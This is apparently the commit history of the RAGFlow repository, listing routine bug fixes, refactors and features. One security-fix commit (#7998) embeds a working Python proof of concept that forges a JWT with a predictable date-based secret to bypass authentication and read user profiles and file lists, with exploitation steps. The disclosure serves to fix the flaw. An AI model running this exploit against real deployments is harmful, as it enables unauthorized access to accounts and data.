400 Commits

Author SHA1 Message Date
Liu An
e9c5c7bc7c
Rafe: Update LLMService type hints (#9131)
### What problem does this PR solve?

- Add Generator return type annotation for tts method
- Import typing.Generator for type hints

### Type of change

- [x] Refactoring
2025-07-31 12:13:49 +08:00
Kevin Hu
d9fe279dde
Feat: Redesign and refactor agent module (#9113)
### What problem does this PR solve?

#9082 #6365

<u> **WARNING: it's not compatible with the older version of `Agent`
module, which means that `Agent` from older versions can not work
anymore.**</u>

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-07-30 19:41:09 +08:00
Stephen Hu
5e7aaf2c41
Fix:When deleting a knowledge base that is currently performing a parsing task, the parsing queue will not be deleted! (#9018)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/8995

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-07-28 17:32:12 +08:00
Stephen Hu
0fccd1fef3
Fix:in the knowledge base operation file will result in an error (#8962)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/8941
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-07-25 19:26:31 +08:00
Yongteng Lei
5cc570f5e0
Refa: suppress DB migration error logs (#9043)
### What problem does this PR solve?

Suppress DB migration error logs.

### Type of change

- [x] Refactoring
2025-07-25 12:38:07 +08:00
Kevin Hu
fbd115773b
Perf: set timeout of some steps in KG. (#8873)
### What problem does this PR solve?

### Type of change


- [x] Performance Improvement
2025-07-16 18:06:03 +08:00
Kevin Hu
f2909ea0c4
Perf: retryable mysql connection. (#8858)
### What problem does this PR solve?

### Type of change

- [x] Performance Improvement
2025-07-15 19:05:48 +08:00
Kevin Hu
aa4a725529
Pref: use redis to check if canceled. (#8853)
### What problem does this PR solve?

### Type of change

- [x] Performance Improvement
2025-07-15 17:19:27 +08:00
Can Wang
779932dcb0
Fix: graphrag, raptor can be null for api created kb issue (#8743)
### What problem does this PR solve?

When knowledgebase/dataset created by API, graphrag and raptor can be
null, and will trigger NoneType error when reach to this code, causing
chunking task not able to finish.

![image](https://github.com/user-attachments/assets/998a63e9-611b-4301-8808-24839a05be8a)

Proposed solution will result in None and pass the condition check
without error.

![image](https://github.com/user-attachments/assets/184374fb-e06a-46e6-b8ac-d66a3fd93b59)


### Type of change

-   Bug Fix (non-breaking change which fixes an issue)
2025-07-09 17:12:42 +08:00
Yongteng Lei
c1f6e6f00e
Feat: add advanced document filter (#8723)
### What problem does this PR solve?

Add advanced document filter

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-07-09 09:33:11 +08:00
Yongteng Lei
4d7bfd2ba3
Fix: typo process_duration (#8696)
### What problem does this PR solve?

Fix typo process_duration.

### Type of change

- [x] Documentation Update
- [x] Refactoring
2025-07-07 14:11:47 +08:00
Fee He
ae3683c346
fix task_service.py (#8687)
Fix the case where pages variable might be None

### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-07-07 09:48:51 +08:00
Can Wang
83c8af1b59
Fix: page_size can be None error (#8603)
### What problem does this PR solve?

Issue #8602

`parser_config.task_page_size` can be defaults to `None` when dataset is
created by API. This was not handled by the `task_executor.py` code thus
`page_size` could sometimes be `None` which will cause issue in line
351.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-07-02 18:38:48 +08:00
Stephen Hu
938d8dd878
Fix: user_default_llm configuration doesn't work for OpenAI API compatible LLM factory (#8502)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/8467
when add llm the llm_name will like "llm1___OpenAI-API"
f09ca8e795/api/apps/llm_app.py (L173)
so we should not use llm1 to query


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-27 09:41:12 +08:00
Yongteng Lei
d768130204
Fix: chunk number error after re-parsing (#8513)
### What problem does this PR solve?

Fix chunk number error after re-parsing. #8503.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-26 17:46:53 +08:00
Stephen Hu
8d9d2cc0a9
Fix: some cases Task return but not set progress (#8469)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8466
I go through the codes, current logic:
When do_handle_task raises an exception, handle_task will set the
progress, but for some cases do_handle_task internal will just return
but not set the right progress, at this cases the redis stream will been
acked but the task is running.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-06-25 09:58:55 +08:00
Yongteng Lei
af6850c8d8
Feat: add MCP dashboard operations (#8460)
### What problem does this PR solve?

Add MCP server dashboard operations.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-25 09:26:04 +08:00
Song Fuchang
fd7ac17605
Feat: Scratch MCP tool calling support. (#8263)
### What problem does this PR solve?

This is a cherry-pick from #7781 as requested.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-06-23 17:45:35 +08:00
Yongteng Lei
1b022116d5
Feat: wrap search app (#8320)
### What problem does this PR solve?

Wrap search app

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-18 16:45:42 +08:00
Jin Hai
4a2ff633e0
Fix typo in code (#8327)
### What problem does this PR solve?

Fix typo in code

### Type of change

- [x] Refactoring

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2025-06-18 09:41:09 +08:00
Liu An
0a13d79b94
Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318)
### What problem does this PR solve?

- Replace hardcoded 255-byte file name length checks with
FILE_NAME_LEN_LIMIT constant
- Update error messages to show the actual limit value
- #8290

### Type of change

- [x] Refactoring

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-06-17 18:01:30 +08:00
Yongteng Lei
0fa1a1469e
Fix: avoid mixing different embedding models in document parsing (#8260)
### What problem does this PR solve?

Fix mixing different embedding models in document parsing.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-06-16 13:40:12 +08:00
Kevin Hu
f7074037ef
Feat: Let number of task ahead be visible. (#8259)
### What problem does this PR solve?


![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1)

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-13 17:32:40 +08:00
Yongteng Lei
b2eed8fed1
Fix: incorrect progress updating (#8253)
### What problem does this PR solve?

Progress is only updated if it's valid and not regressive.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-13 17:24:14 +08:00
Stephen Hu
1ab0f52832
Fix:The OpenAI-Compatible Agent API returns an incorrect message (#8177)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/8175

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 19:17:15 +08:00
Stephen Hu
6953ae89c4
Fix:when stream=false,new message without sessionid does no (#8078)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8070

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 15:14:15 +08:00
Kevin Hu
91804f28f1
Fix: issue for tavily only in a assistant. (#8076)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 13:00:43 +08:00
Gecko Security
de89b84661
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)
### Description

There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.


### Source - Sink Analysis

**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token

**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")
    
    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    
    auth_headers = {"Authorization": malicious_token}
    
    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f"  Email: {user_data.get('email')}")
                    print(f"  User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f"  Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials


**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
2025-06-05 12:10:24 +08:00
天海蒼灆
9938a4cbb6
Feat: Allow update conversation parameters and persist to database in completion (#8039)
### What problem does this PR solve?

This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-04 14:39:04 +08:00
Jin Hai
31f4d44c73
Update upload filename length limit from 128 to 256, which is aligned with os (#7971)
### What problem does this PR solve?

Change filename length limit from 128 to 256

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2025-05-30 14:25:59 +08:00
Qidi Cao
f0879563d0
fix: resolve residual image files issue after document deletion (#7964)
### What problem does this PR solve?

When deleting knowledge base documents in RAGFlow, the current process
only removes the block texts in Elasticsearch and the original files in
MinIO, but it leaves behind many binary images and thumbnails generated
during chunking. This pull request improves the deletion process by
querying the block information in Elasticsearch to ensure a more
thorough and complete cleanup.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-30 12:56:33 +08:00
Stephen Hu
a31ad7f960
Fix: File selection in Retrieval testing causes other options to disappear (#7759)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/7753

The internal is due to when the selected row keys change will trigger a
testing, but I do not know why.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-30 09:38:50 +08:00
Yongteng Lei
0c562f0a9f
Refa: change citation mark as [ID:n] (#7923)
### What problem does this PR solve?

Change citation mark as [ID:n], it's easier for LLMs to follow the
instruction :) #7904

### Type of change

- [x] Refactoring
2025-05-29 10:03:51 +08:00
sinopec
243ed4bc35
Feat: Surpport dynamically add knowledge basees for retrieval while u… (#7915)
…sing the SDK chat API

### What problem does this PR solve?

When using the SDK for chat, you can include the IDs of additional
knowledge bases you want to use in the request. This way, you don’t need
to repeatedly create new assistants to support various combinations of
knowledge bases. This is especially useful when there are many knowledge
bases with different content. If users clearly know which knowledge base
contains the information they need and select accordingly, the recall
accuracy will be greatly improved.

Users only need to add an extra field, a kb_ids array, in the HTTP
request. The content of this field can be determined by the client
fetching the list of knowledge bases and letting the user select from
it.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: Li Ye <liye@unittec.com>
2025-05-28 19:16:16 +08:00
liu an
ff0e82988f
Fix: patch regex vulnerability in filename handling (#7887)
### What problem does this PR solve?

[Regular Expression Injection leading to Denial of Service
(ReDoS)](https://github.com/infiniflow/ragflow/security/advisories/GHSA-wqq6-x8g9-f7mh)

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-27 16:35:37 +08:00
Yongteng Lei
453287b06b Feat: more robust fallbacks for citations (#7801)
### What problem does this PR solve?

Add more robust fallbacks for citations

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
2025-05-23 18:24:55 +08:00
Yongteng Lei
42f4d4dbc8 Fix: wrong type hint (#7738)
### What problem does this PR solve?

Wrong hint type. #7729.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-23 18:21:06 +08:00
Yongteng Lei
e8e2a95165
Refa: more fallbacks for bad citation format (#7710)
### What problem does this PR solve?

More fallbacks for bad citation format

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
2025-05-19 19:34:05 +08:00
Yongteng Lei
0ebf05440e
Feat: repair corrupted PDF files on upload automatically (#7693)
### What problem does this PR solve?

Try the best to repair corrupted PDF files on upload automatically.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-19 14:54:06 +08:00
Song Fuchang
a1f06a4fdc
Feat: Support tool calling in Generate component (#7572)
### What problem does this PR solve?

Hello, our use case requires LLM agent to invoke some tools, so I made a
simple implementation here.

This PR does two things:

1. A simple plugin mechanism based on `pluginlib`:

This mechanism lives in the `plugin` directory. It will only load
plugins from `plugin/embedded_plugins` for now.

A sample plugin `bad_calculator.py` is placed in
`plugin/embedded_plugins/llm_tools`, it accepts two numbers `a` and `b`,
then give a wrong result `a + b + 100`.

In the future, it can load plugins from external location with little
code change.

Plugins are divided into different types. The only plugin type supported
in this PR is `llm_tools`, which must implement the `LLMToolPlugin`
class in the `plugin/llm_tool_plugin.py`.
More plugin types can be added in the future.

2. A tool selector in the `Generate` component:

Added a tool selector to select one or more tools for LLM:


![image](https://github.com/user-attachments/assets/74a21fdf-9333-4175-991b-43df6524c5dc)

And with the `bad_calculator` tool, it results this with the `qwen-max`
model:


![image](https://github.com/user-attachments/assets/93aff9c4-8550-414a-90a2-1a15a5249d94)


### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):

Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
2025-05-16 16:32:19 +08:00
Stephen Hu
2fa8e3309f
Fix: file name length limit mismtach (#7630)
### What problem does this PR solve?

Close #7597

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-14 10:13:03 +08:00
liu an
6bd7d572ec
Perf: Increase database connection pool size (#7559)
### What problem does this PR solve?

1. The MySQL instance is configured with max_connections=1000,
but our connection pool was limited to max_connections: 100.
This mismatch caused connection pool exhaustion during performance
testing.

2.  Increase stale_timeout to resolve #6548

### Type of change

- [x] Performance Improvement
2025-05-09 17:52:03 +08:00
Kevin Hu
2ccec93d71
Feat: support cross-lang search. (#7557)
### What problem does this PR solve?

#7376
#4503
#5710 
#7470

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-09 15:32:02 +08:00
Yongteng Lei
b781207752
Feat: KB detail supports document total size (#7546)
### What problem does this PR solve?

Kb detail supports return document total size now.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-09 11:48:54 +08:00
Kevin Hu
9849230a04
Fix: remove deprecated novitaAI. (#7511)
### What problem does this PR solve?

#7484

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-07 19:36:16 +08:00
Stephen Hu
27ffc0ed74
Feat: Improve 'user_canvan_version' delete and 'document' delete performance (#6553)
### What problem does this PR solve?

1.  Add delete_by_ids method
2. Add get_doc_ids_by_doc_names
3. Improve user_canvan_version's logic (avoid O(n) db IO)
4. Improve document delete logic (avoid O(n) db IO)

### Type of change

- [x] Performance Improvement
2025-05-07 10:55:08 +08:00
Kevin Hu
75b24ba02a
Fix: chat solo issue. (#7479)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-06 19:30:00 +08:00
Yongteng Lei
f29a5de9f5
Fix: filed_map was incorrectly persisted (#7443)
### What problem does this PR solve?

Fix `filed_map` was incorrectly persisted. #7412 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-06 09:44:38 +08:00
Stephen Hu
2dbcc0a1bf
Fix: Tried to fix the fid mis match under some cases (#7426)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/7407

Based on this context, I think there should be some reasons that let
some LLMs have a mismatch (add the wrong "@xxx"),
So I think when use fid can not fetch llm then tried to just use name
should can fetch it.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-04-30 14:55:21 +08:00
alkscr
ab27609a64
Fix: whole knowledge graph lost after removing any document in the knowledge base (#7151)
### What problem does this PR solve?

When you removed any document in a knowledge base using knowledge graph,
the graph's `removed_kwd` is set to "Y".
However, in the function `graphrag.utils.get_gaph`, `rebuild_graph`
method is passed and directly return `None` while `removed_kwd=Y`,
making residual part of the graph abandoned (but old entity data still
exist in db).

Besides, infinity instance actually pass deleting graph components'
`source_id` when removing document. It may cause wrong graph after
rebuild.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-04-30 09:43:17 +08:00